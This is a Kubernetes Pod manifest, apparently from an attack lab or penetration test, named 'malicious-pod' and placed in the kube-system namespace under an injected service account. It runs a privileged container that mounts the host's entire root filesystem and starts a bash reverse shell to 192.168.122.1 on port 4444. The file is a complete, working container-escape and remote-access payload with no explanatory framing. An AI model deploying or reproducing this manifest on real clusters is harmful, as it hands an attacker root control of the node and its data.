apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
  namespace: kube-system
spec:
  serviceAccountName: injected-sa
  volumes:
  - name: share
    hostPath:
      path: /
  containers:
  - name: malicious-pod
    image: nginx
    securityContext:
      privileged: true
    command: ["/bin/bash", "-c"]
    args: ["bash -i >& /dev/tcp/192.168.122.1/4444 0>&1"]
    volumeMounts:
    - name: share
      mountPath: /node_fs
